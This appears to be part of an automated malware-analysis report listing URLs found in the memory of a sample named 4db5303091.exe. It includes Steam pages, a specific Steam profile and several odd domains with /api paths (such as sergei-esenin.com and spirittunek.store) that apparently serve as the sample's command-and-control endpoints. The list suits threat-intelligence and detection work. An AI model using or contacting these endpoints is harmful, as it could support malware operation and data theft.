Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&l=e
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 4db5303091.exe, 00000036.00000002.3037268767.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000D95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dissapoiznw.store:443/apic
Source: 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 4db5303091.exe, 00000036.00000002.3037268767.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000D95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://licendfilteo.site:443/api
Source: 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/K
Source: 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848108898.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037268767.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api-
Source: 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api1
Source: 4db5303091.exe, 00000036.00000002.3037268767.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000D95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apiB
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 4db5303091.exe, 00000036.00000002.3037268767.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000D95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/api
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037689875.0000000000E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 4db5303091.exe, 00000019.00000002.2848108898.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037268767.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 4db5303091.exe, 00000036.00000002.3037268767.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000D95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829724052.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037689875.0000000000E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
